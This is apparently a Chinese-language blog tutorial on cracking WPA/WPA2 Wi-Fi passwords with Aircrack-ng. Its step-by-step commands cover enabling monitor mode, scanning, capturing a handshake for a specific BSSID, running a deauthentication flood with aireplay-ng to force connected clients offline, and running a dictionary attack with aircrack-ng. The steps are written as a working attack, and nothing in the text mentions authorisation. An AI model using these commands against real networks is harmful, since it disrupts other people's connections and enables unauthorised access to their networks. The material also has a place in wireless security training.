Wireless Attacks——Aircarck-ng

利用Aircrack-ng工具破解WPA/WPA2加密模式的无线AP

http://www.aircrack-ng.org/index.html

 

1. 开启网卡的监听模式，命令：

airmon-ng start wlan0

验证是否开启Monitor模式，命令：

iwconfig

Mode:“Monitor”，表示网卡开启成功，可进行下一步操作。

 

2. 利用网卡扫描附近WiFi，并记录下关键参数，命令：

airodump-ng wlan0mon

这时我们找到所需要的WiFi（Game2.4）按Ctrl+c并记录下关键参数，后续步骤会用到下列数据：

1）BSSID: A0:63:91:CA:D2:9B (AP 的MAC地址)
2）CH:11(信道)

 

3. 开始监听、捕获握手包，命令：

airodump-ng -w cao -c 11 --bssid A0:63:91:CA:D2:9B wlan0mon

参数解释： 
　　-w 文件位置，保存在/root/cao
　　-c 信道 
　　--bssid BSSID 网卡名

4. 再新建shell窗口 ，对目标WiFi进行攻击，命令：

在上一步中我们是被动等待，何时能抓取到握手包依赖于何时有设备与该wifi完成成功的认证。

我们可以用aireplay-ng进行deauth洪水攻击，使已连接它的客户端设备掉线，掉线设备一般会自动重连wifi，这样就能快速获取握手包。

aireplay-ng -0 5 -a A0:63:91:CA:D2:9B -c E4:FD:A1:B7:18:A9 wlan0mon
参数解释：
　　-0 是一种攻击模式，不间断攻击
　　 5 发包次数为5次
　　-a BSSID
　　-c 为客户端MAC

 然后，返回看前面的窗口，检查是否抓到握手包，出现下图字样，则代表成功抓取握手包。

 

 

5. 密码破解，命令：

aircrack-ng -w /usr/share/wordlists/fasttrack.txt -b A0:63:91:CA:D2:9B cao-01.cap
参数解释：
　　-w 指定 密码字典（默认就有） 
　　-b 指定 路由器的MAC地址 截获的握手包

 

 

6. 总结

　　只适用于简单密码的破解，本文侧重点是讲解 Aircrack-ng 工具的使用。该工具使用命令行模式，使用时不是很方便，成功率依赖字典库。